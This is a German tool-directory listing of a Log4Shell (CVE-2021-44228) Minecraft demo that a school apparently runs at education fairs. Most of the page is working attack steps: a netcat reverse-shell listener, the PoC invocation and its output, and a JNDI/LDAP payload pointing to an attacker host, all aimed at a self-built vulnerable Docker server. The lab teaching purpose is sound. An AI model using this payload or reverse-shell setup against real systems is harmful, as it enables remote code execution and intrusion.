Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
log4shell-minecraft-demo — Log4Shell (CVE-2021-44228) Minecraft-Demo. Verwendet für Bildungsmessen. | Kitploit
Tools/GitHubGitHub/felixslama/log4shell-minecraft-demo
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & BildungLabs & Praxis
GitHubfelixslama/log4shell-minecraft-demo

log4shell-minecraft-demo

Log4Shell (CVE-2021-44228) Minecraft-Demo. Verwendet für Bildungsmessen.

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen
1vor 2 JahrenNoch nicht geprüft

Log4Shell (CVE-2021-44228) Minecraft-Demo

Diese Demo wird auf Bildungsmessen eingesetzt, um potenziellen zukünftigen Studierenden einen Eindruck von der Abteilung für Cybersicherheit an der HTL Villach zu vermitteln und zu zeigen, wie alltägliche Anwendungen ausgenutzt werden können.

Hinweis: Diese gesamte Demo verwendet Minecraft 1.8.8

Angreifer

Der Angreifer in diesem Szenario verwendet den PoC von kozmer. https://github.com/kozmer/log4j-shell-poc Die gesamte Anerkennung gebührt ihnen. Hinweis: Alle Befehle müssen in attacker/ ausgeführt werden

Anforderungen:

root@kitploit:~
pip install -r requirements.txt

Verwendung:

  • Starte einen Netcat-Listener, um die Reverse-Shell-Verbindung anzunehmen.
root@kitploit:~
nc -lvnp 9001
  • Starte den Exploit.
    Hinweis: Damit dies funktioniert, muss das extrahierte Java-Archiv jdk1.8.0_20 heißen und sich im selben Verzeichnis befinden.
root@kitploit:~
$ python3 poc.py --userip <ip of docker-host> --webport 8000 --lport 9001

[!] CVE: CVE-2021-44228
[!] Github repo: https://github.com/kozmer/log4j-shell-poc

[+] Exploit java class created success
[+] Setting up fake LDAP server

[+] Send me: ${jndi:ldap://<ip of docker-host>:1389/a}

Listening on 0.0.0.0:1389

Dieses Skript richtet für dich den HTTP-Server und den LDAP-Server ein und erstellt außerdem das Payload, das du in den anfälligen Parameter einfügen kannst. Danach solltest du – wenn alles gut gelaufen ist – eine Shell auf dem lport erhalten.


Opfer

Auf der Opfer-Instanz verwenden wir eine veraltete und daher anfällige Version des JDK (jdk1.8.0_20) .

Ersteinrichtung

Um unseren Minecraft-Server zum Laufen zu bringen, müssen wir unser Docker-Image erstellen und ausführen.

Hinweis: Für einen erfolgreichen Build benötigst du eine eigene Kopie des Minecraft Vanilla 1.8.8 Servers (kann wegen Mojangs EULA nicht geteilt werden) Eine mögliche Quelle ist MCVERSIONS.NET

Speichere die Datei nach dem Herunterladen als server.jar in victim/

root@kitploit:~
cd target/
docker build target/ -t minecraft-demo

Ausführen des anfälligen Servers

Führe den soeben mit Docker erstellten anfälligen Minecraft-Server aus.

root@kitploit:~
docker run --name vulnerable-server -p 25565:25565 minecraft-demo

Es ist wahrscheinlich, dass dein Container nach der Ausnutzung einfriert oder hängen bleibt. In diesem Fall kannst du ihn mit dem folgenden Befehl beenden:

root@kitploit:~
docker kill vulnerable-server

Den Server ausnutzen

Um die Schwachstelle auszunutzen, sende einfach die vom poc.py bereitgestellte Zeichenkette im Spiel-Chat.

root@kitploit:~
${jndi:ldap://<ip of docker-host>:1389/a}

image

Tool herunterladen